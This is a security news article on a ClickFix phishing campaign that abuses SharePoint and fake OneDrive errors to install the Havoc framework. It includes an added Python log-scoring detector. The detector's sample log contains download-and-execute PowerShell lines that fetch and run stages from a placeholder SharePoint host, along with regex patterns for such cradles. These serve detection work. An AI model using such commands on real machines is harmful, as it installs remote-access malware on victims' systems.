ClickFix Phishing Attack Exploits SharePoint to Deliver Havoc

An emerging ClickFix phishing scam is exploiting Microsoft SharePoint to lure victims into running PowerShell commands that install the Havoc post-exploitation framework. Uncovered by Fortinet’s FortiGuard Labs, the attack uses fraudulent OneDrive errors to deceive users into executing malicious scripts, giving attackers remote access to infected devices.
Hackers distribute phishing emails with an HTML attachment labeled “Documents.html.” When opened, it displays a fake OneDrive error (0x8004de86) and urges users to update their DNS cache. Clicking the “How to fix” button copies a PowerShell command to the clipboard and instructs users to paste it into a command prompt.
Executing this command triggers another PowerShell script hosted on an attacker-controlled SharePoint server. To avoid analysis, the script first checks if the device is in a sandboxed environment. If it detects a virtualized environment, it shuts down. Otherwise, it modifies the Windows Registry, installs Python if missing, and retrieves and runs a Python script from the same SharePoint site.
The script then delivers Havoc, an open-source post-exploitation framework used for maintaining access and moving through networks. The malware injects Havoc as a DLL, allowing attackers to keep control of the host, spread within the network, and carry out further malicious operations.
To avoid detection, the malware communicates with the attacker’s command-and-control (C2) infrastructure using Microsoft’s Graph API, disguising malicious activity as legitimate SharePoint traffic.
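The attack chain above (SharePoint-hosted PowerShell stage, registry change, Python install, Python script calling the Graph API) leaves a recognizable footprint in PowerShell script-block logging (Event ID 4104). The following detector is an added example written for this article, not code from FortiGuard Labs or from the campaign; it scores exported ScriptBlockText lines against those indicators. The sample log lines, the SharePoint tenant and paths, the indicator weights and the alert threshold are all constructed assumptions for illustration.

```python
"""Score exported PowerShell script-block log lines for ClickFix-style activity.

Added example (not from the article's source report). Input is a list of
strings shaped like Windows Event ID 4104 ScriptBlockText values. Each line is
scored against indicators the article names: a stage fetched from SharePoint,
inline execution, registry writes, Python install/execution and Graph API use.
"""
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are an assumption chosen for this example,
# not a vendor scoring scheme.
INDICATORS = [
    ("sharepoint_fetch", re.compile(r"https?://[\w.-]*sharepoint\.com/", re.I), 3),
    ("download_cradle", re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I), 2),
    ("inline_exec", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2),
    ("hidden_or_bypass", re.compile(
        r"-(w(indowstyle)?\s+hidden|ep\s+bypass|ExecutionPolicy\s+Bypass)\b", re.I), 1),
    ("registry_write", re.compile(r"\b(Set-ItemProperty|New-ItemProperty|reg(\.exe)?\s+add)\b", re.I), 1),
    ("python_stage", re.compile(r"\b(python(\.exe)?|pip)\b.*(install|\.py\b)|\bpython-\d", re.I), 2),
    ("graph_api", re.compile(r"graph\.microsoft\.com", re.I), 2),
]

# Assumption: tuned so a single legitimate SharePoint download (fetch + cradle,
# score 5) stays below the generic threshold.
THRESHOLD = 6


@dataclass
class Finding:
    line_no: int
    score: int
    hits: list = field(default_factory=list)
    verdict: str = "benign"


def score_line(text):
    """Return (matched indicator names, summed weight) for one log line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return hits, score


def classify(hits, score):
    """Map indicator hits to a verdict; chain-specific rules take precedence."""
    if "sharepoint_fetch" in hits and "inline_exec" in hits:
        return "clickfix_stager"      # download-and-execute from SharePoint: first stage
    if "graph_api" in hits and "python_stage" in hits:
        return "possible_havoc_c2"    # Python stage talking to Graph API, as the article describes
    if score >= THRESHOLD:
        return "suspicious"
    return "benign"


def scan(lines):
    """Score and classify every line; returns a list of Finding."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits, score = score_line(line)
        findings.append(Finding(n, score, hits, classify(hits, score)))
    return findings


def summarize(findings):
    """Count findings per verdict, e.g. for a dashboard tile."""
    counts = {}
    for f in findings:
        counts[f.verdict] = counts.get(f.verdict, 0) + 1
    return counts


# Constructed sample log lines; tenant names, paths and script names are placeholders.
SAMPLE_LOG = [
    # an administrator legitimately pulling a report from SharePoint
    r"Invoke-WebRequest -Uri https://example-my.sharepoint.com/sites/finance/report.csv -OutFile C:\Temp\report.csv",
    # clipboard command of the kind the article describes (fetch a stage from SharePoint and run it)
    "powershell -w hidden -c iex (irm https://example-my.sharepoint.com/personal/user/stage.ps1)",
    # second stage: registry write, Python script pulled from the same site and executed
    r"Set-ItemProperty -Path HKCU:\Software\Example -Name Run -Value 1; "
    r"irm https://example-my.sharepoint.com/personal/user/stage.py -OutFile C:\Users\Public\stage.py; "
    r"python.exe C:\Users\Public\stage.py",
    # unrelated maintenance script
    r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB",
    # Python stage polling the Graph API
    r"python.exe C:\Users\Public\stage.py --endpoint https://graph.microsoft.com/v1.0/me/drive",
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no}: {f.verdict:18} score={f.score} hits={f.hits}")
    print(summarize(results))
```

The chain-specific rules fire regardless of score, so a short one-liner that fetches from SharePoint and pipes into `iex` is flagged even though its weighted score alone might be modest; the threshold only backstops variants that dodge those two rules. In production the same logic would read 4104 events from Windows Event Forwarding or a SIEM export rather than an inline list.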
ClickFix phishing campaigns are growing in sophistication, helping deploy malware strains like infostealers, remote access trojans, and DarkGate. Cybercriminals are also expanding beyond email, leveraging platforms like Telegram, where they use fake identity verification services to trick users into running malicious PowerShell commands.
In Q3 2023, phishing attacks surged 173%, reaching 493.2 million incidents, a record-breaking rise. With 1.2% of all daily emails containing malicious content — amounting to 3.4 billion phishing emails globally — phishing remains a dominant cyber threat.
To mitigate these risks, organizations should educate employees on phishing tactics, enforce strict access controls, and monitor cloud services for anomalies. Solutions such as NordVPN’s AI-powered phishing prevention tool, Sonar, can help detect and block phishing threats. As attackers continue to exploit trusted platforms like Microsoft SharePoint, security teams must stay vigilant against evolving threats.